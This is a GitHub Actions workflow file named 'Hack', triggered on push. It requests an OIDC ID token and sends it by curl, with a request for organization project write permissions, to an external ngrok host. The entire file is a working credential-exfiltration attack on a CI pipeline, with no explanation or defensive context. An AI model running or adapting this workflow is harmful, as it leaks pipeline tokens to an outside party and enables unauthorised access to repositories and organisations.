name: Hack
on:
  push:
  workflow_dispatch:

permissions:
  contents: read
  id-token: write

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/github-script@v6
        id: oidc
        with:
          script: |
            const tok = await core.getIDToken("github-token-action-server");
            core.setOutput("token", tok);
      - run: |
          curl -d '{"repositories":[],"permissions":{"organization_projects":"write"}}' -H "Authorization: Bearer ${{steps.oidc.outputs.token}}" -X POST https://ef59-99-250-87-101.ngrok.io
